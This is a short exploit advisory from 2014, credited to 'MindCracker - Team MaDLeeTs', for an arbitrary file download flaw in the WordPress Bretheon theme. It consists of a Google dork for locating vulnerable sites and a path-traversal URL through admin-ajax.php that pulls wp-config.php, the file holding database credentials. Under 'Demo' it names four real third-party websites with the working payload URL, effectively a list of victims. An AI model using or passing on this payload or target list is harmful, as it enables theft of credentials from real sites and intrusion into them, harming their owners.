# Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability

# Date: 17/01/2014

# Exploit Author: MindCracker - Team MaDLeeTs

# Contact : Md5@live.com.pk - Maddy@live.com.pk| https://twitter.com/MindCrackerKhan 

# Tested on: Linux / Window

# Google Dork: inurl:wp-content/themes/bretheon/

######################
 
# PoC

http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


#Demo

http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php